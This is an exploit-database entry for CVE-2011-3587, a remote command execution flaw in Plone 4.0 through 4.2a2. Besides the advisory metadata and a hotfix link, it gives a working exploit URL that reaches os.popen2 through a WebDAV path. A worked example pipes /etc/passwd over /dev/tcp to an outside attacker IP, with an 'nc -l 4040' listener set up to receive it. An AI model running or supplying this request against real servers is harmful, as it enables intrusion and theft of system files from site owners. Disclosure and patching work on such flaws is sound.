vendor:
Plone
by:
Nick Miles
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Plone
Affected Version From: Plone 4.0 (through 4.0.9)
Affected Version To: Plone 4.2 (a1 and a2)
Patch Exists: YES
Related CWE: CVE-2011-3587
CPE: a:plone:plone
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Unix/Linux
2011
Plone – Remote Command Execution
You can execute any command on the remote Plone server with the following request if the server is Unix/Linux based (Note: you won't get returned the results of the command): http://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command to run>. For example, to listen for a connection, the attacker can use the command 'nc -l 4040' and on the victim, visit http://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040
Mitigation:
Install the hotfix provided by Plone at http://plone.org/products/plone/security/advisories/20110928